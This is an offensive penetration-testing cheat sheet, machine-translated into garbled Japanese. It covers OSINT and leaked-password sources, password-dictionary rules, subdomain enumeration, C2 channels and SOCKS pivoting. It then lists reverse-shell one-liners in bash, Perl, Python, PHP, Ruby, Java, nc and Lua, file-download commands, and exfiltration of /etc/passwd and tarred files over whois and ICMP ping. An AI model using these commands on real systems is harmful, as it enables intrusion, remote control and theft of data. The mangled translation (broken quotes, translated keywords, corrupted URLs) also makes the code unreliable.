情報収集
オープンソースインテリジェンス情報コレクション(OSINT)
github
github_nuggests(githubに漏れた敏感な情報を自動的にクロールする):https://github.com/az0ne/github_nuggests
GSIL(15分以内に)ほぼリアルタイムでGitHubでリークされた情報を発見することができます:https://GITHUB.COM/FEEICN/GSIL
X-Patrol(Xiaomiチームの):3359GITHUB.com/misecurity/x-patrol
whois query/register counter-ceck/emailカウンターチェック/関連資産
Webmaster's Home :http://whois.chinaz.com/?domainname=target.comws=
ラブステーション:https://whois.aizhan.com/target.com/
Weibu Online :https://X.Threatbook.cn/
IP Counter-Check:https://dns.aizhan.com/
Tianyancha :https://www.tianyancha.com/
Tiger Mom Check :http://ww.whomx.com/
歴史的脆弱性クエリ:オンラインクエリ:http://wy.zone.ci/
自己構築:https://github.com/hanc00l/wooyun_publi/
Googleハッキング
エンタープライズパスワード辞書を作成
辞書リスト
PasswordList:3359Github.com/lavalamp-/password-lists
Pigman Dictionary :https://pan.baidu.com/s/1dfjyedzblasting_dictionary(弱いパスワード、一般的に使用されるパスワード、ディレクトリブラスト、データベースブラスト、編集者ブラスト、背景爆破などを含むさまざまな辞書を共有および収集します。
特定のメーカーの場合、メーカー関連のドメイン名の辞書の構築に焦点を当てています
['%PWD%123'、 '%user%123'、 '%user%521'、 '%user%2017'、 '%pwd%321'、 '%pwd%521'、 '%user%321'、 '%pwd%123!'、 '%pwd%1 23!@# '、'%PWD%1234 '、'%user%2016 '、'%user%123 $%^'、'%user%123!@# '、'%pwd%2016 '、'%pwd%2017 '、'%pwd%1! '、'%pwd%2 @'、'%PWD%3# '、'%PWD%123#@! '、'%PWD%12345 '、'%PWD%123 $%^'、'%PWD% 56 '、'%user%123#@! '、'%user%
パスワード生成
GenPass(漢字を備えた弱いパスワードジェネレーター:33https://GITHUB.COM/RICTERZ/GENPASS/
Passmaker(ルールをカスタマイズできるパスワード辞書ジェネレーター):https://github.com/bit4woo/passmaker
pydictor(強力なパスワードジェネレーター):https://github.com/landgrey/pydictor
メーリングリストGet
TheHarvester:https://github.com/laramies/theharvester
メールアドレスを取得し、アドレス帳をエクスポートします
LinkedInt :https://github.com/mdsecactivebreach/linkedint
Mailet:https://github.com/ridter/mailget
リークパスワードクエリ
ghostproject:3359ghostproject.fr/
pwndb:https://pwndb2am4tzkvold.onion.to/
エンタープライズ外の関連情報のコレクション
サブドメイン名取得
レイヤーサブドメイン掘削機4.2記念バージョン
subdomainsbrute:https://github.com/lijiejie/subdomainsbrute
wydomain:https://github.com/ring04h/wydomain
sublist3r:https://github.com/aboul3la/sublist3r
site:target.com:https://www.google.com
GitHubコードリポジトリ
パケットキャプチャ分析リクエストリクターズ返品値(ジャンプ/ファイルアップロード/APP/APIインターフェイスなど)
Webmasterヘルパーリンクおよびその他のオンライン検索Webサイト
ドメイン送信の脆弱性
Linux
dig @ns.example.com example=.com axfr
Windows
nslookup -type=ns xxx.yyy.cn #queryドメイン名を解決するDNSサーバー
nslookup #enter nslookupインタラクティブモード
サーバーdns.domian.com #pecify dns server
LS XXX.YYY.CN #LISTドメイン情報
getDomainsByssl.py :3359Note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b1222222222222222222222222222222222222222222222222222222
censys.io証明書:https://censys.io/certificates?q=target.com
CRT.SH証明書クエリ3:3359CRT.SH/?Q=%25.Target.com
Shadon :https://www.shodan.io/
Zoomeye :https://www.zoomeyee.org/
FOFA :https://FOFA.SO/
Censys:https://Censys.io/
dnsdb.io :3359dnsdb.io/zh-cn/search?q=target.com
api.hackertarget.com :3358api.hackertarget.com/reversedns/?q=target.com
community.riskiq.com :3359Community.riskiq.com/search/target.com
subdomain3 :https://github.com/yanxiu0614/subdomain3
Fuzzdomain :https://github.com/chora10/fuzzdomain
dnsdumpster.com :3359dnsdumpster.com/
phpinfo.me :3359phpinfo.me/domain/
DNS Open Data Interface :https://DNS.BUFFEROVER.RUN/DNS?Q=BAIDU.com
イントラネット
を入力しますエンタープライズの弱いアカウントの抜け穴に基づいて
VPN(電子メール、パスワードブラスト、ソーシャルワーカーなどを介してVPNを取得)
エンタープライズ関連の運用およびメンテナンスシステム(Zabbixなど)
システムの脆弱性に基づいて入力
Metasploit(脆弱性エクスプロイトフレームワーク):3359Github.com/rapid7/Metasploit-framework
スクリプトを悪用します
ウェブサイトのアプリケーションの普及
SQL注入
クロスサイトスクリプト(XSS)
クロスサイトリクエスト偽造(CSRF)
ssrf(ssrf_proxy)
機能/ビジネスロジックの脆弱性
その他の脆弱性など
CMSコンテンツ管理システムの脆弱性
エンタープライズセルフビルドエージェント
ワイヤレスWi-Fiアクセス
シーン攻撃
コマンドとコントロール
ICMP :3359Pentestlab.blog/2017/07/28/Command-and-Control-icmp/
DNS :https://Pentestlab.blog/2017/09/06/command-and-control-dns/
Dropbox :https://Pentestlab.blog/2017/08/29/command-and-control-dropbox/
gmail :https://pentestlab.blog/2017/08/03/command-and-control-gmail/
Telegram :http://drops.xmd5.com/static/drops/tips-16142.html
Twitter :https://Pentestlab.blog/2017/09/26/command-and-control-twitter/
ウェブサイトキーワード:https://Pentestlab.blog/2017/09/14/command-and-control-website-keyword/
Powershell :https://Pentestlab.blog/2017/08/19/command-and-control-powershell/
Windows com :https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
webdav :https://pentestlab.blog/2017/09/12/command-and-control-webdav/
Office 365 :https://www.anquanke.com/post/id/86974
https :https://pentestlab.blog/2017/10/04/command-and-control-https/
Kernel :https://Pentestlab.blog/2017/10/02/command-and-control-kernel/
ウェブサイト:https://Pentestlab.blog/2017/11/14/command-and-control-website/
WMI :https://Pentestlab.blog/2017/11/20/command-and-control-wmi/
WebSocket :https://Pentestlab.blog/2017/12/06/command-and-control-websocket/
画像:https://Pentestlab.blog/2018/01/02/command-and-control-images/
Webインターフェイス:https://Pentestlab.blog/2018/01/03/command-and-control-web-interface/
JavaScript :https://Pentestlab.blog/2018/01/08/command-and-control-javascript/
.
フロンティング
ドメインフロンティング
tor_fronting。
エージェント
VPN
http :http://cn-proxy.com/
トル
インターネットクロスボーダーアプリケーション
イントラネットクロスボーダー転送
NCポート転送
LCXポート転送
NP
プロキシスクリプトTunna
reduh
.
イントラネットクロスボーダープロキシ浸透
ew
フォワードソックスV5サーバー:
./ew -s ssocksd -l 1080
リバウンドソックスV5サーバー:A)最初に、パブリックネットワークIPを使用してホストAで次のコマンドを実行します。
$ ./ew -s rcsocks -l 1080 -e 8888
b)ターゲットホストBで靴下V5サービスを開始し、パブリックホストのポート8888にバウンスします
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
マルチレベルのカスケード
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
LCX_TRANの使用
$ ./EW -S SSOCKSD -L 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
LCX_LISTENとLCX_SLAVEの使用
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./EW -S SSOCKSD -L 9999
$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999
参照のために「3レベルのカスケード」ローカルソックステストケース
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
シロアリ
use :3https://rootkiter.com/termite/readme.txtの手順
プロキシスクリプト
Regeorg :3359github.com/sensepost/regeorg
シェルリバウンド
bash
bash -i /dev/tcp/10.0.0.1/8080 01
Perl
perl -e '使用socket; $ i='10 .0.0.1 '; $ p=1234; socket(s、pf_inet、sock_stream、getprotobyname(' tcp ')); if(connect(s、 sockaddr_in($ p、inet_aton($ i)))){open(stdin、 's'); open(stdout、 's'); open(stderr、 's'); exec( '/bin/sh -私');};'
Python
python -c 'インポートソケット、サブプロセス、OS; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '10.0.0.1'、1234)); o s.dup2(s.fileno()、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); p=subprocess.call(['/bin/sh' '、' -i '];'
Php
php -r '$ sock=fsocopen('10 .0.0.1'、1234); exec( '/bin/sh -i 3 3 23'); '
ルビー
ruby -rsocket -e'f=tcpsocket.open('10 .0.0.1 '、1234).to_i; exec sprintf('/bin/sh -i%d%d 2%d '、f、f、f)'
Java
r=runtime.getRuntime()
p=r.exec(['/bin/bash'、 '-c'、 'exec 5/dev/tcp/10.0.0.1/2002; cat 5 | while read line; do \ $ line 25 5; done'] string []))
p.waitfor()
NC
#use-e
NC -E /BIN /SH 223.8.200.234 1234
#not used-e
mknod /tmp /backpipe p
/bin/sh 0/tmp/backpipe | NC AttacherIPリスニングポート1/TMP/バックパイプ
ルア
lua -e 'require(' socket '); require(' os '); t=socket.tcp(); t:connect(' 202.103.243.122 '、' 1234 '); os.execute('/bin/sh -i 3 3 23 ');'
イントラネットファイルの転送およびダウンロード
WPUT
wput dir_name ftp://linuxpig:123456@host.com/
wget
wget http://site.com/1.rar -o 1.rar
ARIAC2(インストールする必要があります)
aria2c -o owncloud.zip 3https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
Powershell
$ p=new-Object System.net.webclient
$ P.DownLoadFile( 'http://Domain/file'、 'c:%homepath%file')
VBSスクリプト
args=wscript.argumentsを設定します
url='http://domain/file'
dim xhttp: set xhttp=createObject( 'microsoft.xmlhttp')
dim bstrm: set bstrm=createObject( 'adodb.stream')
xhttp.open 'get'、url、false
xhttp.send
BSTRMで
.type=1 '。開ける。xhttp.responsebodyを作成します
.savetofile 'c: \%homepath%\ file'、2 '
で終わります
実行:cscript test.vbs
Perl
#!/usr/bin/perl
lwp:simpleを使用します。
getStore( 'http://domain/file'、 'file');
実行:perl test.pl
Python
#!/usr/bin/python
urllib2をインポートします
u=urllib2.urlopen( 'http://domain/file')
localfile=open( 'local_file'、 'w')
localfile.write(u.read())
localfile.close()
実行:python test.py
ルビー
#!/usr/bin/ruby
「net/http」が必要です
net:http.start( 'www.domain.com'){| http |
r=http.get( '/file')
open( 'Save_Location'、 'wb'){| file |
file.write(r.body)
}
}
実行:Ruby test.rb
Php
?php
$ url='http://ww.example.com/file';
$ path='/path/to/file';
$ ch=curl_init($ url);
curl_setopt($ ch、curlopt_returntransfer、true);
$ data=curl_exec($ ch);
curl_close($ ch);
file_put_contents($ path、$ data);
?
実行:php test.php
ncattacker
CATファイル| NC -L 1234
ターゲット
NC HOST_IP 1234ファイル
FTP
FTP 127.0.0.1ユーザー名パスワードファイル終了を取得します
TFTP
TFTP -IホストGET C:%HOMEPATH%FILE LOCATION_OF_FILE_ON_TFTP_SERVER
bitsadmin
bitsadmin /転送n http://domain /file c:%homepath%file
ウィンドウファイル共有
正味使用x: \ 127.0.0.1 \ share /user:example.comuserid mypassword
SCPローカルからリモート
SCPファイルuser@host.com:/TMP
リモートからローカル
scp user@host.com:/TMPファイル
rsyncリモートrsyncサーバーからローカルマシンにファイルをコピーする
rsync -av root@192.168.78.192:3360ww /databack
ローカルマシンからリモートRSYNCサーバーにファイルをコピーする
rsync -av /databack root@192.168.78.192:3360www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
コピー
コピー\\ ip \ sharename \ file.exe file.exe
WHOISレシーバーホストB:
NC -VLNP 1337 | SED 's///g' | base64 -d
送信者ホストA:
whois -h host_ip -p 1337 `cat /etc /passwd | base64`
WHOIS + TARFIRST:
ncat -k -l -p 4444 |ティーファイル。b64#teeファイルに、それが確実に持っていることを確認できるようにする
次
TAR CZF - /TMP /* | base64 | xargs -iビットタイムアウト0.03 whois -h host_ip -p 4444ビット
ついに
cat files.b64 | tr -d '\ r \ n' | base64 -d | tar zxv#ファイルを出力します
Ping送信終了:
xxd -p -c 4 Secret.txt |読み取りライン。 ping -c 1 -p $ line ipを行います。終わり
受信者ping_receiver.py:
sysをインポートします
try:
scapy.allからimport *
:を除く
印刷( 'SCAPYが見つかりません、SCAPY: PIPインストールSCAPY'をインストールしてください ')
sys.exit(0)
def process_packet(pkt):
pkt.haslayer(ICMP):の場合
pkt [icmp] .type==8:の場合
data=pkt [icmp] .load [-4:]
print(f '{data.decode(' utf-8 ')}'、flush=true、end=''、sep='')